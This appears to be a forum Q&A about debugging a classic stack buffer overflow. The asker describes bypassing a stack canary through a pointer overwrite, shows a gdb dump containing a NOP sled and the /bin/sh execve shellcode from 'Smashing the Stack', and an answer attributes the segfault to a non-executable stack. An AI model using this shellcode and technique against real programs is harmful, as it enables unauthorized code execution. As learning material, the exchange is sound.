Buffer overflow : EIP and jump correctly set but segfault

I am performing a buffer overflow, by avoiding the canary through a memcpy to a pointer, as explained here . In short, you overwrite the address a pointer points to, with the address of the RET in the stack. So memcpy-ing to that pointer, effectively overwrites RET.

Using gdb, I inject my NOP-sled + shellcode + address_overwrite just fine. I can see that RET, at 0xbffff52c, contains a desired address, 0xbffff4c0, that will land in the NOP sled.

(gdb) x /32xw $esp 0xbffff470: 0xbffff52c 0x0804a008 0x00000004 0x00000000 0xbffff480: 0x000003f3 0x08048327 0x90909087 0x90909090 0xbffff490: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4a0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4b0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4c0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4d0: 0x90909090 0x90909090 0x90909090 0xeb909090 0xbffff4e0: 0x76895e1f 0x88c03108 0x46890746 0x890bb00c (gdb) 0xbffff4f0: 0x084e8df3 0xcd0c568d 0x89db3180 0x80cd40d8 0xbffff500: 0xffffdce8 0x69622fff 0x68732f6e 0xbffff52c 0xbffff510: 0xbffff5a8 0xb7ff5990 0x0000008f 0xbffff5a8 0xbffff520: 0xb7fd1ff4 0x0804a008 0xbffff5a8 0xbffff4c0 0xbffff530: 0x0804a008 0x0804a008 0x0000008f 0x00000001 0xbffff540: 0x00000801 0x00000000 0xbfff0000 0x002001ac 0xbffff550: 0x000081a4 0x00000001 0x000004ad 0x000004ad 0xbffff560: 0x00000000 0x00000000 0xb7fd0000 0x0000008f

However , running this I get the error bellow, even though dissasembly shows I landed good.

Program received signal SIGSEGV, Segmentation fault.
0xbffff4c0 in ?? ()
(gdb) disas 0xbffff4c0, + 10
Dump of assembler code from 0xbffff4c0 to 0xbffff4ca:
=> 0xbffff4c0:  nop
   0xbffff4c1:  nop
   0xbffff4c2:  nop
   0xbffff4c3:  nop
   0xbffff4c4:  nop
   0xbffff4c5:  nop
   0xbffff4c6:  nop
   0xbffff4c7:  nop
   0xbffff4c8:  nop
   0xbffff4c9:  nop

Further below is the shellcode.

    0xbffff4df:  jmp    0xbffff500
   0xbffff4e1:  pop    %esi
   0xbffff4e2:  mov    %esi,0x8(%esi)
   0xbffff4e5:  xor    %eax,%eax
   0xbffff4e7:  mov    %al,0x7(%esi)
   0xbffff4ea:  mov    %eax,0xc(%esi)
   0xbffff4ed:  mov    $0xb,%al
   0xbffff4ef:  mov    %esi,%ebx

... etc.

I used the shellcode from Smashing the stack , Appendix B, for the linux system. Can you help me understand what's wrong?

You didn't say what OS you are on, or how you built your target program.

Assuming Linux and no -Wl,-z,execstack, modern Linux distributions default to -Wl,-z,noexecstack, which (surprise!) makes stack non-executable.

You can read about some of the protection mechanisms here.